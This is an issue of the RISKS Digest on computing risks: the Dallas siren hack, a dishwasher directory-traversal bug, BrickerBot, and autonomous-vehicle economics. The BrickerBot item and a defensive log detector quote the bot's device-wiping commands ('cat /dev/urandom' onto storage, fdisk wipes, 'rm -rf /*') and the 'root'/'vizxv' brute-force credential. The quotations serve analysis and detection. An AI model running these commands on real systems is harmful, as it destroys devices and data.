The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 30 Issue 24

Saturday 15 April 2017

Contents

Someone hacked every tornado siren in Dallas. It was loud.
Avi Selk
Brexit vote site may have been hacked, MPs say in report
BBC
Prison inmates built working PCs out of e-waste, networked them, and hid them in a closet ceiling
BoingBoing
Is Your Fingerprint-Locked Cell Phone Really Secure?
Patch
FBI Arrests Hacker Who Hacked No One
The Daily Beast
"Dishwasher has directory traversal bug"
The Register
"BrickerBot" disables vulnerable IoT devices
Radware
Securing driverless taxis is going to be really really hard
BoingBoing
Uber's 'Hell' program tracked and targeted Lyft drivers
Engadget
Autonomous Electric Vehicle impact on Economy
Evans & Shedlock
Google's Sheriffbot: presto, no more bugs!
Dan Jacobson
IPv6 attacks bypass network intrusion-detection systems
IT News
How Scammers Were Able to Game Google Maps
Fortune via Gabe Goldberg
Security firms sometimes wreck FBI investigations. Here's how.
CyberScoop
Anova Ticks Off Customers By Requiring Accounts To Cook Food Using The App
Consumerist
Interesting interview with Ed Felten on his FTC and WH experience
PGN
Re: Follow the Money
Peter Houppermans
Re: How Garadget Avenged a One-Star Review With Digital Sabotage
Amos Shapir
Re: The future of the open Internet
Chris Drewe
Info on RISKS (comp.risks)

Someone hacked every tornado siren in Dallas. It was loud. (Avi Selk)

Dewayne Hendricks <dewayne@warpspeed.com>
Sun, Apr 9, 2017 at 3:03 PM
*The Washington Post*, 9 Apr 2017
<https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/>

Dallas residents got an unexpected wake-up call on 8 Apr when all the city's
156 emergency sirens were set off just before midnight.  Officials say a
hacker was to blame. (Reuters)

Last year, someone kept hacking into traffic signs in Dallas—corrupting
bland electronic messages into jokey missives such as: "Work is Canceled,
Go Back Home", and "Donald Trump Is A Shapeshifting Lizard".

Funny? Dumb? Vandalism? Whatever your opinion of the pranks, the big Dallas
hack of 2016 had one quality totally lacking in this year's sequel: It was
silent.


Brexit vote site may have been hacked, MPs say in report (BBC)

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 12 Apr 2017 12:54:14 PDT
A voter registration site that crashed in the run-up to last year's EU
referendum could have been targeted by a foreign cyber attack, MPs say.

The "register to vote" site <https://www.gov.uk/register-to-vote> crashed
on 7 June last year just before the deadline for people to sign up to vote.

The UK government and electoral administrators blamed a surge in demand
after a TV debate.

But MPs on the parliamentary Public Administration Committee say a foreign
cyber attack could not be ruled out.

http://www.bbc.com/news/uk-politics-39564289


Prison inmates built working PCs out of e-waste, networked them, and hid them in a closet ceiling

Gabe Goldberg <gabe@gabegold.com>
Thu, 13 Apr 2017 23:32:48 -0400
Inmates in Ohio's Marion Correctional Institution smuggled computer parts
out of an e-waste recycling workshop and built two working computers out of
them, hiding them in the ceiling of a training-room closet and
covertly patching them into the prison's network.

The prisoners used the PCs for a number of activities, including several
criminal acts like identity theft and credit-card fraud. They were able to
network their PCs by using a guard's password; the use of this account on
days when the guard wasn't on shift tipped off the prison's systems
administrators that something was awry.

http://boingboing.net/2017/04/12/mother-necessity-where-would-w.html


Is Your Fingerprint-Locked Cell Phone Really Secure? (Patch)

Gabe Goldberg <gabe@gabegold.com>
Tue, 11 Apr 2017 14:32:36 -0400
https://patch.com/virginia/annandale/s/g38gc/is-your-fingerprint-locked-cell-phone-really-secure

Some devices—my iPad, for example—require entering passcode after a
very few failed fingerprint attempts. So trying random "masterprints" to
unlock may not be practical or terribly successful.


FBI Arrests Hacker Who Hacked No One (The Daily Beast)

Gabe Goldberg <gabe@gabegold.com>
Wed, 12 Apr 2017 09:55:30 -0400
He built a piece of software.  That tool was pirated and abused by
hackers. Now the feds want him to pay for the computer crooks' crimes.

http://www.thedailybeast.com/articles/2017/03/31/fbi-arrests-hacker-who-hacked-no-one.html


"Dishwasher has directory traversal bug" (The Register)

Gene Wirchenko <genew@telus.net>
Thu, 06 Apr 2017 12:03:38 -0700
https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/
Thanks a Miele-on for making everything dangerous,
Internet of Things firmware slackers
Richard Chirgwin, *The Register*, 26 Mar 2017

selected text:

Don't say you weren't warned: Miele went full Internet-of-Things with a
network-connected dishwasher, gave it a web server, and now finds itself on
the wrong end of a security bug report—and it's accused of ignoring the
warning.

The utterly predictable vulnerability advisory on the Full Disclosure
mailing list details CVE-2017-7240—aka Miele Professional PG 8528—Web
Server Directory Traversal.  This is the built-in web server that's used to
remotely control the glassware-cleaning machine from a browser.

And because Miele is an appliance company and not a pure-play IT company, it
doesn't have a process for reporting or fixing security bugs. The researcher
who noticed the dishwasher's web server vulnerability—Jens Regel of
German company Schneider-Wulf—complains that Miele never responded when
he contacted the biz with his findings; he says his first contact was made
in November 2016.
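
The bug class named in the advisory above, a web server that lets "../" in
a request path reach files outside its document root, is easy to avoid once
the request is resolved and checked against the root.  The following is an
added illustration, not code from The Register, Miele, or the CVE-2017-7240
advisory (nothing is known here about the PG 8528's actual server code).  It
contrasts the naive join-and-serve pattern with a resolver that decodes the
request, resolves symlinks, and refuses anything that ends up outside the
root.  The document root, files and request paths are constructed inside
the example.

```python
"""Safe static-file resolution for an embedded web server (added example)."""
import os
import posixpath
import tempfile
from pathlib import Path
from urllib.parse import unquote


def _inside(path: Path, root: Path) -> bool:
    """True if path is root or lies below root (both must be resolved)."""
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def naive_resolve(doc_root: str, request_path: str) -> str:
    """The buggy pattern: join the request onto the root and trust the result.
    os.path.normpath collapses '..' but happily collapses *past* the root, so a
    request for '../secret.txt' names a file outside doc_root."""
    return os.path.normpath(os.path.join(doc_root, request_path.lstrip("/")))


def safe_resolve(doc_root: str, request_path: str):
    """Return the Path under doc_root that request_path names, or None if the
    request would leave the root via '..', percent-encoding, or a symlink."""
    root = Path(doc_root).resolve()
    decoded = unquote(request_path)            # '%2e%2e%2f' -> '../'
    if "\x00" in decoded:                      # embedded NUL: reject outright
        return None
    rel = posixpath.normpath(decoded.lstrip("/"))   # absolute paths are root-relative
    candidate = (root / rel).resolve()         # follows symlinks, collapses '..'
    return candidate if _inside(candidate, root) else None


def demo():
    """Build a throwaway document root with one page plus a symlink that points
    outside it (constructed), then show what each resolver would serve."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve() / "www"
        root.mkdir()
        (root / "index.html").write_text("<h1>ok</h1>")
        outside = Path(tmp).resolve() / "secret.txt"
        outside.write_text("not for the web")
        (root / "leak").symlink_to(outside)    # hypothetical stray symlink

        requests = ["index.html", "/index.html", "sub/../index.html",
                    "../secret.txt", "%2e%2e%2fsecret.txt", "leak"]
        results = {}
        for req in requests:
            got = safe_resolve(str(root), req)
            results[req] = None if got is None else got.name

        naive = Path(naive_resolve(str(root), "../secret.txt")).resolve()
        naive_escapes = not _inside(naive, root)
        return results, naive_escapes


if __name__ == "__main__":
    served, escaped = demo()
    for req, name in served.items():
        print(f"{req!r:28} -> {name}")
    print("naive resolver escapes root:", escaped)
```

The containment check is done after `resolve()`, not on the raw string, so
encoded dots, redundant segments and symlinks are all judged by where the
request actually lands on disk.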


"BrickerBot" disables vulnerable IoT devices (Radware)

Henry Baker <hbaker1@pipeline.com>
Sat, 08 Apr 2017 17:53:14 -0700
FYI—Southern California is an area prone to wildfires, which have
routinely destroyed many homes in the past.  As a result, there are *fire
regulations* that force home-owners to clean up vegetation which can burn
and put homes at risk.  Fire departments also engage in "controlled burns",
which more-or-less-safely burn up some of the brush that can sustain a
wildfire.  And when fighting a wildfire, fire departments often have to set
"backfires", which burn the brush ahead of the wildfire to remove the fuel
that would enable the main fire to spread.

Apparently, some vigilante has decided to light a *controlled
burn*/*backfire* in order to clear out the brush (vulnerable IoT devices)
that would sustain a much larger & more damaging wildfire (major
infrastructure breach and/or denial-of-service).

A biological analogy for "BrickerBot" might be IoT "apoptosis".

https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1417

"BrickerBot" Results In Permanent Denial-of-Service, 5 Apr 2017

Abstract

Imagine a fast-moving bot attack designed to prevent the victim's hardware
from functioning.  Called Permanent Denial-of-Service (PDoS), this form of
cyber-attack is becoming increasingly popular in 2017 as more incidents
involving this hardware-damaging assault occur.

Also known loosely as "phlashing" in some circles, PDoS is an attack that
damages a system so badly that it requires replacement or re-installation of
hardware.  By exploiting security flaws or misconfigurations, PDoS can
destroy the firmware and/or basic functions of a system.  It is a contrast to
its well-known cousin, the DDoS attack, which overloads systems with
requests meant to saturate resources through unintended usage.

BrickerBot—Discovery and Analysis of a PDoS Tool

Over a four-day period, Radware's honeypot recorded 1,895 PDoS attempts
performed from several locations around the world.  Its sole purpose was to
compromise IoT devices and corrupt their storage.  Besides this intense,
short-lived bot (BrickerBot.1), Radware's honeypot recorded attempts from a
second, very similar bot (BrickerBot.2) which started PDoS attempts on the
same date—both bots were discovered less than one hour apart—with
lower intensity but more thorough, and with its location(s) concealed by TOR
egress nodes.

Compromising a Device

The Bricker Bot PDoS attack used Telnet brute force - the same exploit
vector used by Mirai - to breach a victim's devices.  Bricker does not try
to download a binary, so Radware does not have a complete list of
credentials that were used for the brute force attempt, but was able to
record that the first attempted username/password pair was consistently
'root'/'vizxv'.

Corrupting a Device

Upon successful access to the device, the PDoS bot performed a series of
Linux commands that would ultimately lead to corrupted storage, followed by
commands to disrupt Internet connectivity, device performance, and the
wiping of all files on the device.  Below is the exact sequence of commands
that were performed by the PDoS bots:

fdisk -l
busybox cat /dev/urandom >/dev/mtdblock0 &
busybox cat /dev/urandom >/dev/sda &
busybox cat /dev/urandom >/dev/mtdblock10 &
busybox cat /dev/urandom >/dev/mmc0 &
busybox cat /dev/urandom >/dev/sdb &
busybox cat /dev/urandom >/dev/ram0 &
fdisk -C 1 -H 1 -S 1 /dev/mtd0
w
fdisk -C 1 -H 1 -S 1 /dev/mtd1
w
fdisk -C 1 -H 1 -S 1 /dev/sda
w
fdisk -C 1 -H 1 -S 1 /dev/mtdblock0
w
route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1
halt -n -f
reboot

Among the special devices targeted are /dev/mtd (Memory Technology Device -
a special device type to match flash characteristics) and /dev/mmc
(MultiMediaCard - a special device type that matches memory card standard, a
solid-state storage medium).

The sysctl commands attempt to reconfigure kernel parameters:
net.ipv4.tcp_timestamps=0 disables TCP timestamps which does not affect
local LAN IPv4 connectivity but seriously impacts the Internet
communication, and kernel.threads-max=1 limits the max number of kernel
threads to one.  Typically, this is in the 10,000s for ARM-based devices.

Targets

The use of the 'busybox' command combined with the MTD and MMC special
devices means this attack is targeted specifically at Linux/BusyBox-based
IoT devices which have their Telnet port open and exposed publicly on the
Internet.  These match the devices targeted by Mirai or related IoT
botnets.

The PDoS attempts originated from a limited number of IP addresses spread
around the world.  All devices are exposing port 22 (SSH) and running an
older version of the Dropbear SSH server.  Most of the devices were
identified by Shodan as Ubiquiti network devices; among them are Access
Points and Bridges with beam directivity. ...
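
The Radware write-up quoted above gives a defender everything needed to
recognise this sequence in a Telnet honeypot or device shell log: the
'root'/'vizxv' first credential, /dev/urandom streamed onto MTD, MMC and
block devices, partition tables rewritten with fdisk, rm -rf /*, and the
kernel.threads-max=1 sysctl.  The following detector is an added example,
not Radware's code or tooling.  The one-event-per-line log format
(timestamp, source IP, event type, payload) and the IP addresses are
constructed for the example; the command strings in the sample session are
the ones listed in the report.

```python
"""Flag BrickerBot-style PDoS command sequences in a Telnet honeypot log."""
import json
import re
from collections import defaultdict

# Constructed events in an invented format: "<ts> <ip> login <user>/<pw> <OK|FAIL>"
# or "<ts> <ip> cmd <shell line>".  Session 1 replays the reported sequence,
# session 2 is a benign login, session 3 only probes the known credential.
SAMPLE_LOG = """\
2017-04-05T03:14:07Z 198.51.100.23 login root/vizxv OK
2017-04-05T03:14:08Z 198.51.100.23 cmd fdisk -l
2017-04-05T03:14:08Z 198.51.100.23 cmd busybox cat /dev/urandom >/dev/mtdblock0 &
2017-04-05T03:14:08Z 198.51.100.23 cmd busybox cat /dev/urandom >/dev/sda &
2017-04-05T03:14:09Z 198.51.100.23 cmd fdisk -C 1 -H 1 -S 1 /dev/mtd0
2017-04-05T03:14:09Z 198.51.100.23 cmd w
2017-04-05T03:14:10Z 198.51.100.23 cmd route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
2017-04-05T03:14:10Z 198.51.100.23 cmd sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1
2017-04-05T03:14:11Z 198.51.100.23 cmd halt -n -f
2017-04-05T03:20:41Z 203.0.113.8 login admin/admin OK
2017-04-05T03:20:44Z 203.0.113.8 cmd uname -a
2017-04-05T03:20:45Z 203.0.113.8 cmd cat /proc/cpuinfo
2017-04-05T03:31:02Z 192.0.2.77 login root/vizxv FAIL
2017-04-05T03:31:05Z 192.0.2.77 login admin/admin FAIL
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<event>login|cmd) (?P<payload>.*)$")

# Each indicator is one observable step of the reported sequence.
INDICATORS = {
    "storage_wipe": re.compile(r"/dev/urandom\s*>\s*/dev/(mtd|mmc|sd|ram)"),
    "partition_rewrite": re.compile(r"\bfdisk\s+-C\s+1\s+-H\s+1\s+-S\s+1\b"),
    "root_delete": re.compile(r"\brm\s+-rf\s+/\*"),
    "route_removal": re.compile(r"\broute\s+del\s+default\b"),
    "threads_max_1": re.compile(r"kernel\.threads-max=1\b"),
    "forced_halt": re.compile(r"^(halt|reboot)\b"),
}
# Any of these alone means the device's storage is being destroyed.
DESTRUCTIVE = {"storage_wipe", "partition_rewrite", "root_delete"}
KNOWN_FIRST_CREDENTIAL = ("root", "vizxv")   # from the Radware report


def parse_log(text):
    """Group events by source IP; malformed lines are skipped, not fatal."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions[m["ip"]].append((m["event"], m["payload"]))
    return sessions


def analyze(text):
    """Return {ip: {"verdict", "indicators", "first_login"}} for every session.
    verdict is 'pdos' when a destructive step was seen, 'suspicious' when only
    precursor indicators (credential probe, route/sysctl tampering) were seen,
    and 'benign' otherwise."""
    report = {}
    for ip, events in parse_log(text).items():
        hits, first_login = set(), None
        for event, payload in events:
            if event == "login":
                user_pw = payload.partition(" ")[0]
                if first_login is None:
                    first_login = tuple(user_pw.split("/", 1))
            else:
                hits.update(name for name, rx in INDICATORS.items() if rx.search(payload))
        if first_login == KNOWN_FIRST_CREDENTIAL:
            hits.add("bricker_first_credential")
        verdict = "pdos" if hits & DESTRUCTIVE else ("suspicious" if hits else "benign")
        report[ip] = {"verdict": verdict, "indicators": sorted(hits),
                      "first_login": first_login}
    return report


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOG), indent=2))
```

A session that reaches the 'pdos' verdict is already lost; the value of the
detector is in the 'suspicious' sessions and in the inventory question it
raises, which devices on your own network answer on Telnet with a default
credential at all.  Adapt LINE_RE to the honeypot or syslog format you
actually collect.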


Securing driverless taxis is going to be really really hard (BoingBoing)

Lauren Weinstein <lauren@vortex.com>
Wed, 12 Apr 2017 08:20:23 -0700
NNSquad
http://boingboing.net/2017/04/12/uber-for-carjacking.html

  Charlie Miller made headlines in 2015 as part of the team that showed it
  was possible to remote-drive a Jeep Cherokee over the internet, triggering
  a 1.4 million vehicle recall; now, he's just quit a job at Uber where he
  was working on security for future self-driving taxis, and he's not
  optimistic about the future of this important task.


Uber's 'Hell' program tracked and targeted Lyft drivers (Engadget)

Lauren Weinstein <lauren@vortex.com>
Thu, 13 Apr 2017 07:33:46 -0700
NNSquad
https://www.engadget.com/2017/04/13/uber-hell-program-lyft-drivers/

  As for Lyft, a spokesperson told The Information: "We are in a competitive
  industry. However, if true, these allegations are very concerning." A
  couple of law firms that worked with Uber in the past also told the
  publication that the company could face a number of allegations, including
  breach of contract, unfair business practices, misappropriation of trade
  secrets and violation of the federal Computer Fraud and Abuse Act.

Are self-driving taxis just going through pUBERty?


Autonomous Electric Vehicle impact on Economy (Evans & Shedlock)

"Alister Wm Macintyre" <macwheel99@wowway.com>
Mon, 10 Apr 2017 10:26:53 -0500
https://mishtalk.com/2017/04/08/second-order-consequences-of-self-driving-vehicles/

http://ben-evans.com/benedictevans/2017/3/20/cars-and-second-order-consequences

Imagining transportation in our next generation.

[?] of global oil production is for vehicle fuels.

But if that is replaced by electric for electric cars, how do we get that
extra power—other fossil fuels, solar, hydro-electric, more nuclear power
plants?

Over 1 million people killed per year in road accidents, mostly human error.
Those accidents also cause property damage, medical and legal costs, traffic
jams, insurance costs.  With dramatically fewer collisions, will we still
need such a large investment in safety features?

Millions of long-haul truck drivers, local taxi and delivery drivers, and
non-drivers supporting those industries.

Driverless trucks need robots, or cheap labor, for loading & unloading at
various destination points of the trucks.

Trucks can be driving 24 hours, instead of 11, minus time to refuel & get
maintenance.  Will we need as many trucks?  They can travel safely much
faster, except for terrorist hacker caused spectacular mass pile ups.

150,000 gas stations, most of their money made selling cigarettes and
snacks.

They can morph into battery recharge for driverless cars, while their owners
are at home asleep, or busy at day job.

Payment could be via prepaid account, or other banking arrangement.  Owner
might also have a standing request for the battery fill up place to
replenish in-car supply of snacks and cigarettes for the normal vehicle
riders.

Then when owner exits home, or day job, car is on-demand and supplied with
the usual, so riders not inconvenienced with extra stops in transit, the
autonomous vehicle to handle all that at times when normal riders not need
it.

If our autonomous vehicle is on demand, it need no longer be parked in
walking distance.  Congestion less, when cities no longer need long term
parking lanes.

If our car is parked driverless, until we send the signal to call it to pick
us up, how will that driverless car put coins in parking meter, where it is
off-street parked waiting to be called?  May it go driverless to the battery
fill up place, so it is fully ready when on-demand called?

Will bus service be only in high population areas, with robotaxi on the city
fringes?

Will robot farm vehicles see what service is needed where, without human
involvement?

Today there are grocery stores serving the disabled.  Order what's needed,
via Internet, then drive to the store, whose personnel loads it up with the
groceries, no need to get out of car.  That technology could later be
morphed to driverless car get the groceries, a robot unload them at home.

Contemporary city road sides are filled with retail marketing signs aimed at
occupants of manually driven vehicles, encouraging them to stop here for a
restaurant, shopping, whatever.  But if we are to have autonomous cars
zooming past too fast to see the signs, marketing to reach riders of the
autonomous vehicles may need a sea change of technology rethinking.  If
those vehicles are using smart roads, commercial establishments will want
marketing to the cars coming their way, offering choices aimed at
demographics of their riders.  Will we have a bill board inside our cars,
with info about the retail establishments along our coming route?  We can
select what we want, then the car will stop there, and the store workers
will deliver our purchases to our car, for all manner of products.

A gas fill up takes only 4 minutes, but with Tesla Supercharger, you'll need
to stop 16 times more often for a battery fill up.  Can solar on top of
vehicles make a difference?  Electric cars easily catch on fire.  The
technology needs improving, so a whole battery can be slid out & replaced
with one which has been charging unattended, like at home & replacement
stations for long trips. Batteries are heavy, perhaps too heavy for elderly,
and other segments of population.  Will they need a robot helper?

Think parking garages with battery recharging stations, or robot service
going from car to car, checking what's needed, with fees added at check out
time, where license plate & auto description used to match up fees due.  Can
any driverless cars there pay by credit card signal, which cannot be
detected by fraudsters not inside the garage?

When there's an accident, police not only get CCTV of vehicles involved,
before the collision, but also data about them from every vehicle close to
them in driving prior to the accident, and records from their prior
maintenance.

City redesign, more bike paths.  Autonomous vehicles can follow each other
faster with less of an air gap, so we'll need more pedestrian bridges, less
reliance on cross-walks. Supply those bridges with coin operated escalators,
supporting transit by wheel chairs and other disabled.

If and when school bus fleets get equivalent modernization, they can learn
from past troubles unfixable under the old technology.

1. Please change U.S. state laws to support shoulder harnesses, designed for
child size passengers, in addition to the lap seat belts.

2. School buses can send signals ordering relevant autonomous vehicles to
halt while stop sign is hanging out.

What will auto passengers DO when autonomous vehicle driving?  We can
legalize drinking while commuting again.  The happy hour will be in the
commute home.  More in-vehicle entertainment systems.


Google's Sheriffbot: presto, no more bugs!

Dan Jacobson <jidanni@jidanni.org>
Fri, 14 Apr 2017 05:13:11 +0800
https://www.google.com/search?q=chromium+sheriffbot

Here's an example of it hard at work:

  Comment #2 on issue 12345 by sheriffbot@chromium.org:

  Issue has not been modified or commented on in the last 365 days, please
  re-open [we can't, only they can] or file a new bug if this is still an
  issue.

  For more details visit
  https://www.chromium.org/issue-tracking/autotriage
  Your friendly Sheriffbot

So what is the problem?

Well, you might say it is like a virus/worm that eats through one's bug
database, closing things.

And how is the user to be convinced that filing a new(!) bug again won't
just end up with the same result? (Same for enthusiasm for filing other bugs
too.)


IPv6 attacks bypass network intrusion-detection systems (IT News)

Lauren Weinstein <lauren@vortex.com>
Sun, 9 Apr 2017 07:57:18 -0700
NNSquad
https://www.itnews.com.au/news/ipv6-attacks-bypass-network-intrusion-detection-systems-457476

  A paper has been published by researchers at the NATO defence alliance's
  Cooperative Cyber Defence Centre of Excellence and Estonia's Tallinn
  University of Technology. It outlines how attackers can create covert data
  exfiltration channels and system remote control, using IPv6 transition
  mechanisms.


How Scammers Were Able to Game Google Maps

Gabe Goldberg <gabe@gabegold.com>
Sat, 8 Apr 2017 14:13:06 -0400
It's now easier than ever to find a plumber to fix your leaky toilet by
simply searching Google Maps for nearby journeymen. However, there's a
chance that the plumbers you may contact could be scammers who got their
bogus listings displayed on Google's online map service.

To address the troublemakers, Google said this week that it's cracking down
on fake business listings and is making it harder for crooks to game its
mapping service.

The search giant and the University of California, San Diego released a
research paper based on an analysis of over 100,000 scam listings to
discover some of the most common ways fraudsters trick people on Google
Maps.  Additionally, the research paper said that some of the scamming
methods it discovered could also "apply to other map services, such as Yelp
and Bing Maps."

http://fortune.com/2017/04/07/google-scammers-maps/


Security firms sometimes wreck FBI investigations. Here's how.

Gabe Goldberg <gabe@gabegold.com>
Sat, 8 Apr 2017 14:17:44 -0400
https://www.cyberscoop.com/security-researchers-occasionally-disrupt-fbi-investigations-heres-how/


Anova Ticks Off Customers By Requiring Accounts To Cook Food Using The App (Consumerist)

Gabe Goldberg <gabe@gabegold.com>
Fri, 14 Apr 2017 09:51:43 -0400
Being able to control devices in your kitchen via your phone is convenient,
at least that was the case for owners of the Anova Precision Cooker. But
many of those consumers say a recent update to the sous vide cooker's app
requires them to create an account and share personal information with the
company in order to use all of the features of the device.

https://consumerist.com/2017/04/12/anova-ticks-off-customers-by-requiring-mandatory-accounts-to-cook-food/

IoT food prep. What could go wrong with that?

  [Remember, I never sausage nonsense.  The wurst is yet to come.  PGN]


Interesting interview with Ed Felten on his FTC and WH experience

"Peter G. Neumann" <neumann@csl.sri.com>
Thu, 13 Apr 2017 13:41:09 PDT
http://www.princeton.edu/main/news/archive/S49/20/23S03/?section=topstories

  “Computer scientists need to develop a culture of government service, I
  think it should be evident right now that it is not the best thing for our
  field, or for society, to sit back.''

Felten said society is facing significant, rapid changes from developments
ranging from self-driving cars to artificial intelligence.  If society is
going to adapt to these developments and avoid disruption, technical experts
must play a central role.

  “If our community of scientists and engineers doesn't show up and
  participate in the process, the decisions are still going to get made but
  they will get made without the full input they need, It is very important
  to show up.''


Re: Follow the Money (Weinstein, RISKS-30.23)

Peter Houppermans <ph@houppermans.net>
Fri, 7 Apr 2017 09:08:12 +0200
  "I am convinced that the massive rise in Internet hate speech --
  including on YouTube in continuing conflict with Google's own terms of
  service—has been largely driven by ad network-based monetization
  systems."

I wonder how much "social" media's enthusiasm for eradicating fake news and
hate speech will increase if they realise this has created yet another
argument for ad blocking.

This is yet again a case of neglect creating consequences: in their quest
for volume, they did not screen for malware, which is now the main driver
for people to block advertising (more so than to protect their privacy).
Not checking content has created a high volume of fake news, ironically
called into life by giving it its own, new name rather than calling it what
it is: lies.

I've seen quite a few of these accounts under credible names; the giveaway
is usually the fact that they're recent (late 2016 or 2017), of course their
content, and often the use of a computer-generated voice in the material,
which suggests that those creating the material either do not speak English
or speak it with a sufficiently strong accent to give the game away.  Using
computer speech prevents that - all they need is a script.  It is all rather
too intelligent for it to be done by casual operators.

Unfortunately, this neglect is not victimless: sites that depend on ad
revenue suffer as a consequence because they don't have the resources to
build up their own client base - what I find interesting is that big news
setups don't seem to be able to go it alone either and host their own ads.
If I were a business dependent on ads I'd try to find an outlet with a
sufficiently discerning policy that ensured sensible placement - a quest
that may just spur the advertising agencies into creating their own network
after all.

They too are finally discovering that "free" carries a hefty price.


Re: How Garadget Avenged a One-Star Review With Digital Sabotage (RISKS-30.23)

Amos Shapir <amos083@gmail.com>
Sun, 9 Apr 2017 19:18:29 +0300
This operator's attitude problem just serves to demonstrate the real
problem with this device (and many other IOT devices): The gadget requires
a continuous and permanent Internet connection to the operator's site.

This opens up a Pandora's box of possible problems, each one of which can
render the device useless (at best).  I wouldn't touch anything like that
with a ten-foot pole (or any other means of connection).


Re: The future of the open Internet (RISKS-30.23)

Chris Drewe <e767pmk@yahoo.co.uk>
Thu, 13 Apr 2017 22:22:27 +0100
In Europe, there are mutterings about making ISPs, search engines, social
networking sites, etc. legally responsible for whatever they handle
(i.e., making them publishers instead of transmission systems), which may
well have the same result but for a very different reason.  Right now,
internet/computer companies are accused of promoting terrorism by allowing
extremists to communicate freely and (gasp!) secretly, thus allowing them to
broadcast propaganda and plot their acts of violence, while at the same time
people can send and receive objectionable 'adult' material, Fake News,
financial scams and other swindles, and the problem of illegal file-sharing
of copyrighted material has never gone away.  (And the companies make money
from this, as if it was somehow OK if they were government departments or
not-for-profit organisations.)

While I'm no expert, it looks like there's the obvious problem of the huge
resources needed to vet the vast amount of information available, which
would in turn require funding not likely to be available with current
business models.  In the case of social networking sites, much of their
appeal (so they tell me) is the spontaneity of being able to post a message
visible around the world in seconds, which would be lost if posts had to be
submitted to an editorial panel for consideration, after payment of a fee...

Of course the USA tends to have a more-robust approach to freedom of speech
than Europe so there's the additional problem of material that's acceptable
in one part of the world but not elsewhere, hence the possibility of
separate walled gardens in different territories.

Getting back to the original post:

> So far, the story of the Internet has followed the same tragic narrative
> that's befallen other information technologies over the past 160 years:
>
>   * Inventors discovered the technology.
>   * Hobbyists pioneered the applications of that technology, and
>     popularized it.
>   * Corporations took notice. They commercialized the technology,
>     refined it, and scaled it.
>   * Once the corporations were powerful enough, they tricked the government
>     into helping them lock the technology down. They installed themselves
>     as natural monopolies.

Having worked in telecomms, I can't see that, say, the telephone could have
developed into a worldwide mass speech communications system without the
resources of large companies or governments to invest in the expensive
hardware required, and standards are needed so that individual countries'
and companies' systems can interconnect.
